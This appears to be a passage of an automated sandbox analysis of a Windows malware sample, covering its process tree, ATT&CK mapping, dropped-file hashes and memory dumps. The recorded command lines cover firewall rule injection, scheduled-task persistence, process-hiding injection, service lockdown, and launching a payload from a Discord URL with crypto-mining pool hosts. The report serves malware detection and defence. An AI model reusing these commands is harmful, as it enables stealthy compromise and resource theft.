PID 4684 wrote to memory of 5088	4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4684 wrote to memory of 5088	4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 196	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 196	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 196	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 4124	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	cmd.exe
PID 4064 wrote to memory of 4124	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	cmd.exe
PID 4124 wrote to memory of 4128	4124	cmd.exe	netsh.exe
PID 4124 wrote to memory of 4128	4124	cmd.exe	netsh.exe
PID 4064 wrote to memory of 1656	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 1656	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 1656	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 4004	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 4004	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 4004	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
PID 4064 wrote to memory of 4192	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	csrss.exe
PID 4064 wrote to memory of 4192	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	csrss.exe
PID 4064 wrote to memory of 4192	4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	csrss.exe
PID 4192 wrote to memory of 4420	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 4420	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 4420	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 4460	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 4460	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 4460	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 2848	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 2848	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 2848	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 428	4192	csrss.exe	injector.exe
PID 4192 wrote to memory of 428	4192	csrss.exe	injector.exe
PID 716 wrote to memory of 396	716	windefender.exe	cmd.exe
PID 716 wrote to memory of 396	716	windefender.exe	cmd.exe
PID 716 wrote to memory of 396	716	windefender.exe	cmd.exe
PID 396 wrote to memory of 3020	396	cmd.exe	sc.exe
PID 396 wrote to memory of 3020	396	cmd.exe	sc.exe
PID 396 wrote to memory of 3020	396	cmd.exe	sc.exe
PID 4192 wrote to memory of 2888	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 2888	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 2888	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 1848	4192	csrss.exe	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
PID 4192 wrote to memory of 1848	4192	csrss.exe	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
PID 4192 wrote to memory of 1848	4192	csrss.exe	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
PID 4192 wrote to memory of 3612	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 3612	4192	csrss.exe	powershell.exe
PID 4192 wrote to memory of 3612	4192	csrss.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
"C:\Users\Admin\AppData\Local\Temp\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Users\Admin\AppData\Local\Temp\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
"C:\Users\Admin\AppData\Local\Temp\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe"
2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:196

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:4128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4780

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
4⤵
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:428

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:3148

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
4⤵
- Executes dropped EXE
PID:1848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3612

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2664

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ng15wdgt.ynb.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
db3a6264aad75bf1813cfe18e568d869

SHA1
06dd96754d3f195fc104d5ea9edcd58fe46013d9

SHA256
50c9cb68e952df44245ef8db3a66c7d33a5ae9fd036f3c05db854bf34f040813

SHA512
e356085aeaf07558f7f02dc8a6ffe3c9b2cbfa6549d6441dfa75d4b35c1a88fc7071dc432738410bd879224a9870b8b5af4ba6e9e1460eb5fd048fe20fab0d4c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
9d74cfaec7360a09e2c53b86f022b64f

SHA1
30e17b27b0afb10c2f68cb725d3a41475428b89c

SHA256
cd2179a22cdd5330ce7bf2a349ae9aade4ab6b6a9a0a6951da32c3d5ef9e129a

SHA512
4466e30f60cd6a1c9bc3ee3217b6f335727263400cc0defbf035f2614e1439b7d37a553c072a67aad1751d8c321f7f2504ddcae935ee6dabdfc5e9f2e31b7785

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
316d71a0e1db822923ee81b0f82bc912

SHA1
6a3849665af17822e8645c9af086ab0927464d8f

SHA256
62163b2105e095f47f2ebcc939c35ef4293cb0c89ca5656e2d04b54c6bc0699f

SHA512
4c3f67ce32e5bc8e67e0ae880d603ccf00096994df7eb5626ca010c76968c959053db75074e6e842cc6a9b542b156e0583acf9cfe83b96419f0826b13285a418

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
e495072f5e1035517cb21f8584a0ee03

SHA1
cfd387b88568f5ab99d2fad1d6b59680cb97cfe0

SHA256
2ee222a78793d3f4f4bc915f91e236842515a2d92e2be98c0e9c15ea73298229

SHA512
d3c3270cc39940af2260c9fd0b2b6ec7a700e3ede9c1ee0eecd54a6cbd5d688d83db95223e1731bafdee54c22d8f61ba38a26c828ab7e0503c45f7846114566f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
c1cf3331512dd8f0b31f28c035ea81f5

SHA1
daa1a49d2e661f338fd79999b8dcd88160f13acd

SHA256
338d300e63a7833fdc940acbe9f73883de92a9bb66c47c854cb3672d59e7c920

SHA512
968a2eacc79ebbeb2d1094c112ce4a96634cde57d8dc937653e8aaef268d602eabc4439f314231a5c26b912509c5295b53e39064565e1d042a6d583312a45718

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
caaca8b220f9da3fcb584378f796560c

SHA1
5618bba89c710a39095db492e898a062122962c9

SHA256
49f1b04bb2c22a2d2feb15e6bde658a0c9f1c45ad6e83df3f6061730f8706b41

SHA512
2618c8f1f3a5569b82832ea2ea37acbf1e99a9143889ab3bcad24e6f2e23953a55582a61dc77a8d691877cd820ba6a5b969161a0d0af63ae1a5b3cc229052f1a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
18KB

MD5
ac783a350ed72dcf364b68f2fc8c5803

SHA1
13f1c039e5ced076b9faa02d2157fdc3f3bfefe1

SHA256
242afced3022d40999145c8d6937958116637b2516ba7170aa7a63deff65c578

SHA512
64c06f6520317914e095eff87502add6e82a5a42dc9995e7d9908a5c1252f1b04def2c691ff17c360d0a880665adce4d07838d26e58de736f2c282afeb88f473

Download Submit
C:\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
6c1956eb2baee6fbd3c111b4c26cd490

SHA1
70f0c07eea58dbe10210da4a6dae0939ef9d7009

SHA256
7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b

SHA512
5573adade375b1ffb27d3550368167c6fe3d910f6186798dd5ba1c318371d1177df647bd1f06429c6bf1c29afaa275a7ab6a1eaa47f082d7d9e46e58c8f9a026

Download Submit
C:\Windows\windefender.exe
Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
memory/196-312-0x0000000007EE0000-0x0000000007F2B000-memory.dmp

Filesize
300KB

Download
memory/196-338-0x0000000009430000-0x00000000094D5000-memory.dmp

Filesize
660KB

Download
memory/196-311-0x0000000007900000-0x0000000007C50000-memory.dmp

Filesize
3.3MB

Download
memory/196-308-0x0000000006A60000-0x0000000006A70000-memory.dmp

Filesize
64KB

Download
memory/196-309-0x0000000006A60000-0x0000000006A70000-memory.dmp

Filesize
64KB

Download
memory/196-331-0x000000007F8F0000-0x000000007F900000-memory.dmp

Filesize
64KB

Download
memory/196-310-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/196-333-0x0000000070700000-0x0000000070A50000-memory.dmp

Filesize
3.3MB

Download
memory/196-332-0x00000000706B0000-0x00000000706FB000-memory.dmp

Filesize
300KB

Download
memory/196-549-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/196-339-0x0000000006A60000-0x0000000006A70000-memory.dmp

Filesize
64KB

Download
memory/716-1790-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1656-790-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/1656-581-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1656-576-0x0000000070700000-0x0000000070A50000-memory.dmp

Filesize
3.3MB

Download
memory/1656-554-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1656-553-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/1656-575-0x00000000706B0000-0x00000000706FB000-memory.dmp

Filesize
300KB

Download
memory/1656-555-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/2664-1792-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2664-1796-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2664-1802-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4004-795-0x0000000001010000-0x0000000001020000-memory.dmp

Filesize
64KB

Download
memory/4004-794-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/4004-796-0x0000000001010000-0x0000000001020000-memory.dmp

Filesize
64KB

Download
memory/4004-818-0x0000000070700000-0x0000000070A50000-memory.dmp

Filesize
3.3MB

Download
memory/4004-817-0x00000000706B0000-0x00000000706FB000-memory.dmp

Filesize
300KB

Download
memory/4004-823-0x0000000001010000-0x0000000001020000-memory.dmp

Filesize
64KB

Download
memory/4004-1036-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/4064-307-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4064-304-0x0000000005120000-0x0000000005A0B000-memory.dmp

Filesize
8.9MB

Download
memory/4064-303-0x0000000004D10000-0x0000000005111000-memory.dmp

Filesize
4.0MB

Download
memory/4064-793-0x0000000004D10000-0x0000000005111000-memory.dmp

Filesize
4.0MB

Download
memory/4064-1040-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4064-798-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1793-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1817-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1843-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1841-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1839-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1837-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1835-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1833-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1831-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1829-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1827-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1825-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1823-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1821-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1819-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1815-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1043-0x0000000005000000-0x00000000053F9000-memory.dmp

Filesize
4.0MB

Download
memory/4192-1046-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1813-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1811-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1809-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1807-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1805-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1803-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1801-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1799-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1797-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1782-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1795-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4192-1791-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4420-1051-0x00000000087A0000-0x00000000087EB000-memory.dmp

Filesize
300KB

Download
memory/4420-1047-0x00000000738E0000-0x0000000073FCE000-memory.dmp

Filesize
6.9MB

Download
memory/4420-1048-0x0000000005280000-0x0000000005290000-memory.dmp

Filesize
64KB

Download
memory/4420-1049-0x0000000008080000-0x00000000083D0000-memory.dmp

Filesize
3.3MB

Download
memory/4420-1070-0x000000007F190000-0x000000007F1A0000-memory.dmp

Filesize
64KB

Download
memory/4684-2-0x0000000005150000-0x0000000005A3B000-memory.dmp

Filesize
8.9MB

Download
memory/4684-1-0x0000000004D50000-0x000000000514D000-memory.dmp

Filesize
4.0MB

Download
memory/4684-3-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4684-300-0x0000000000400000-0x000000000311B000-memory.dmp

Filesize
45.1MB

Download
memory/4684-302-0x0000000005150000-0x0000000005A3B000-memory.dmp

Filesize
8.9MB

Download
memory/5088-7-0x0000000073880000-0x0000000073F6E000-memory.dmp

Filesize
6.9MB

Download
memory/5088-75-0x00000000705E0000-0x0000000070930000-memory.dmp

Filesize
3.3MB

Download
memory/5088-10-0x0000000006E60000-0x0000000007488000-memory.dmp

Filesize
6.2MB

Download
memory/5088-14-0x00000000074C0000-0x0000000007810000-memory.dmp

Filesize
3.3MB

Download
memory/5088-12-0x0000000006D50000-0x0000000006DB6000-memory.dmp

Filesize
408KB

Download
memory/5088-16-0x0000000007E60000-0x0000000007EAB000-memory.dmp

Filesize
300KB

Download
memory/5088-13-0x0000000006DC0000-0x0000000006E26000-memory.dmp

Filesize
408KB

Download
memory/5088-35-0x0000000007EC0000-0x0000000007EFC000-memory.dmp

Filesize
240KB

Download
memory/5088-66-0x0000000008A20000-0x0000000008A96000-memory.dmp

Filesize
472KB

Download
memory/5088-81-0x00000000098D0000-0x0000000009975000-memory.dmp

Filesize
660KB

Download
memory/5088-76-0x0000000009870000-0x000000000988E000-memory.dmp

Filesize
120KB

Download
memory/5088-15-0x00000000078F0000-0x000000000790C000-memory.dmp

Filesize
112KB

Download
memory/5088-74-0x0000000070590000-0x00000000705DB000-memory.dmp

Filesize
300KB

Download
memory/5088-73-0x0000000009890000-0x00000000098C3000-memory.dmp

Filesize
204KB

Download
memory/5088-82-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/5088-83-0x0000000009AD0000-0x0000000009B64000-memory.dmp

Filesize
592KB

Download
memory/5088-281-0x0000000009A40000-0x0000000009A48000-memory.dmp

Filesize
32KB

Download
memory/5088-276-0x0000000009A50000-0x0000000009A6A000-memory.dmp

Filesize
104KB

Download
memory/5088-299-0x0000000073880000-0x0000000073F6E000-memory.dmp

Filesize
6.9MB

Download
memory/5088-8-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/5088-6-0x0000000004620000-0x0000000004656000-memory.dmp

Filesize
216KB

Download
memory/5088-11-0x0000000004520000-0x0000000004542000-memory.dmp

Filesize
136KB

Download
memory/5088-9-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download